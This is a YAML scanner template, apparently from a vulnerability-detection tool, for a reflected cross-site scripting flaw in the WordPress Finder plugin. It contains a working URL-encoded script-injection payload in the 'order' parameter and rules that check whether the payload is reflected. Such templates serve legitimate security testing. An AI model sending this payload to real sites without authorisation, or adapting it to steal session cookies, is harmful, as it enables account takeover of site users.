product: WordPress
vName: WordPress Finder - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress Plugin Finder contains a cross-site scripting vulnerability via the order parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
version: ''
note: ''
search: { }
protocol: http
link: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
